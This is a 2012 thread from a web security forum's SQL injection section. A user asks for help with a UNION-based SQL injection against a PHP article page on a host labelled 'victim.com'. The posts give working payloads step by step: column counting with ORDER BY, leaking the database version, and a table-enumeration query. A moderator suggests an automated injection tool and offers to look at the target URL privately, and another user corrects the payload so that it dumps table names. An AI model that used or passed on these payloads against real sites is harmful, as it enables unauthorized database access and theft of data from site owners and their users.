|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Help need with my injection |
|
Posted: Mon Aug 20, 2012 6:45 am |
|
|
phoenixg |
Regular user |
|
|
Joined: Aug 20, 2012 |
Posts: 6 |
|
|
|
|
|
|
|
nothing:
Code: | http://victim.com/project/articles.php?code=6&id=603 order by 15 |
show normal:
Code: | http://victim.com/project/articles.php?code=6&id=603 order by 14 |
so I tried:
Code: | http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 |
show:
2
3
By 12
4
5
then I tried:
Code: | http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14 |
show:
2
3
By 12
4
5.1.61
then I tried:
Code: | http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database(),6,7,8,9,10,11,12,13,14 |
but nothing show, how to change the injection? |
|
|
|
|
Posted: Mon Aug 20, 2012 12:50 pm |
|
|
demon |
Moderator |
|
|
Joined: Sep 22, 2010 |
Posts: 485 |
|
|
|
|
|
|
|
try havij |
|
|
|
|
Posted: Tue Aug 21, 2012 2:09 am |
|
|
phoenixg |
Regular user |
|
|
Joined: Aug 20, 2012 |
Posts: 6 |
|
|
|
|
|
|
|
when I download and unzip havij, Norton notice me trojan ! |
|
|
|
|
Posted: Mon Aug 27, 2012 12:56 am |
|
|
phoenixg |
Regular user |
|
|
Joined: Aug 20, 2012 |
Posts: 6 |
|
|
|
|
|
|
|
I still stuck on it, I need help |
|
|
|
|
Posted: Mon Aug 27, 2012 11:10 am |
|
|
demon |
Moderator |
|
|
Joined: Sep 22, 2010 |
Posts: 485 |
|
|
|
|
|
|
|
send me PM with the site url |
|
_________________ Go BIG or go HOME ! |
|
|
|
Posted: Mon Aug 27, 2012 1:32 pm |
|
|
vince213333 |
Advanced user |
|
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
|
|
|
|
Your SQL syntax is wrong:
Code: | http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database(),6,7,8,9,10,11,12,13,14 |
Must be:
Code: | http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() |
because those numbers 6 to 14 are also part of the SELECT part of your query |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|